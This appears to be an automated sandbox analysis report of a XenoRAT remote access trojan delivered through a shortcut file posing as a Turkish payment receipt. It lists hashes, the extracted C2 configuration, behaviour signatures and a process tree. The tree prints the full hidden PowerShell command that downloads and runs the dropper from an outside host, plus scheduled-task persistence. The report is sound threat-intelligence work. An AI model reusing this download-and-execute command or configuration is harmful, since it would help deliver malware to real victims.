xenorat | 881ce6908e060231a797a1db1700ac66a2a58822cfcf8b932ff83a96833a8ceb

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03/05/2024, 13:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dekontu/Odeme -(Mayis).lnk
Size

2KB
MD5

2ad899ef7b0d361186d8487950b7e167
SHA1

151d04d656e68152cc2116b0837331a7df30eb27
SHA256

2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618
SHA512

2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b

Score

10^/10

xenorat execution rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif

Extracted

Family

xenorat

dns.requimacofradian.site

Mutex

Xeno_rat_nd8818g

Attributes

delay
60000
install_path
appdata
port
1243
startup_name
uic

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2820	PoWeRShElL.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2820	PoWeRShElL.exe

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
2444	screenbiwus.pif
2052	screenbiwus.pif
1600	screenbiwus.pif
2776	screenbiwus.pif
2064	screenbiwus.pif
1512	screenbiwus.pif
2256	screenbiwus.pif
1624	screenbiwus.pif

Loads dropped DLL 4 IoCs

pid	Process
2444	screenbiwus.pif
2444	screenbiwus.pif
2444	screenbiwus.pif
1600	screenbiwus.pif

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2444 set thread context of 2052	2444	screenbiwus.pif	31
PID 2444 set thread context of 1600	2444	screenbiwus.pif	32
PID 2444 set thread context of 2776	2444	screenbiwus.pif	33
PID 2064 set thread context of 1512	2064	screenbiwus.pif	35
PID 2064 set thread context of 2256	2064	screenbiwus.pif	36
PID 2064 set thread context of 1624	2064	screenbiwus.pif	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
748	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2820	PoWeRShElL.exe
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif
2052	screenbiwus.pif

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	PoWeRShElL.exe
Token: SeDebugPrivilege	2444	screenbiwus.pif
Token: SeDebugPrivilege	2064	screenbiwus.pif
Token: SeDebugPrivilege	2052	screenbiwus.pif

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 2820	2232	cmd.exe	29
PID 2232 wrote to memory of 2820	2232	cmd.exe	29
PID 2232 wrote to memory of 2820	2232	cmd.exe	29
PID 2820 wrote to memory of 2444	2820	PoWeRShElL.exe	30
PID 2820 wrote to memory of 2444	2820	PoWeRShElL.exe	30
PID 2820 wrote to memory of 2444	2820	PoWeRShElL.exe	30
PID 2820 wrote to memory of 2444	2820	PoWeRShElL.exe	30
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 2052	2444	screenbiwus.pif	31
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 1600	2444	screenbiwus.pif	32
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 2444 wrote to memory of 2776	2444	screenbiwus.pif	33
PID 1600 wrote to memory of 2064	1600	screenbiwus.pif	34
PID 1600 wrote to memory of 2064	1600	screenbiwus.pif	34
PID 1600 wrote to memory of 2064	1600	screenbiwus.pif	34
PID 1600 wrote to memory of 2064	1600	screenbiwus.pif	34
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 1512	2064	screenbiwus.pif	35
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 2256	2064	screenbiwus.pif	36
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37
PID 2064 wrote to memory of 1624	2064	screenbiwus.pif	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Dekontu\Odeme -(Mayis).lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
    "C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
      C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2052
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmp" /F
        5⤵
        Creates scheduled task(s)
        
        PID:748
  - - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
      C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1600
    - - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        
        "C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2064
      - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        
        C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        6⤵
        Executes dropped EXE
        
        PID:1512
      - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        
        C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        6⤵
        Executes dropped EXE
        
        PID:2256
      - C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        
        C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
        6⤵
        Executes dropped EXE
        
        PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
      C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
      4⤵
      Executes dropped EXE
      PID:2776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif

Filesize
243KB

MD5
f6839c83a19cfb9112997be29ba02a88

SHA1
b558ada6c8f1603b8c700a74afc33bfbb14ac713

SHA256
09d6f45a4cf61b2eaf9b715c712d6e61410a7d838b71e31fa4b12c012afb2d90

SHA512
0724132c9cbdd1394cc3e17d557c7c82b8e30b34b1adc207f7b77dc498b63e5c03768de88b261bd986cfe18ab8a70ff77c4dabc5b215d58a959287c7f38fdd8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmp

Filesize
1KB

MD5
cd6994537023694f4533ff4244156d8a

SHA1
b581d11e2cad75bd5b7e440169f423cb18117a40

SHA256
b03bd499a8ab96f583f7029110764a3a08ecd976f4e2ec9e7b74c414d20c6707

SHA512
f9d3f71138a6af0d0435d3b66b7277a92696050dc3f3fdfb2842f02d8bf2a948342101da4747e74d003c23dd13799d4940496043fad866b9bc2045de54ea9cd0

Download Submit
memory/2052-69-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2052-62-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2052-59-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2064-81-0x0000000000370000-0x00000000003B6000-memory.dmp

Filesize
280KB

Download
memory/2444-53-0x0000000000830000-0x0000000000876000-memory.dmp

Filesize
280KB

Download
memory/2444-55-0x0000000000240000-0x0000000000246000-memory.dmp

Filesize
24KB

Download
memory/2444-57-0x00000000002B0000-0x00000000002B6000-memory.dmp

Filesize
24KB

Download
memory/2444-56-0x0000000000260000-0x00000000002A0000-memory.dmp

Filesize
256KB

Download
memory/2820-38-0x000007FEF5D3E000-0x000007FEF5D3F000-memory.dmp

Filesize
4KB

Download
memory/2820-54-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-45-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-44-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-46-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-39-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2820-40-0x0000000002900000-0x0000000002908000-memory.dmp

Filesize
32KB

Download
memory/2820-41-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-42-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-43-0x000007FEF5A80000-0x000007FEF641D000-memory.dmp

Filesize
9.6MB

Download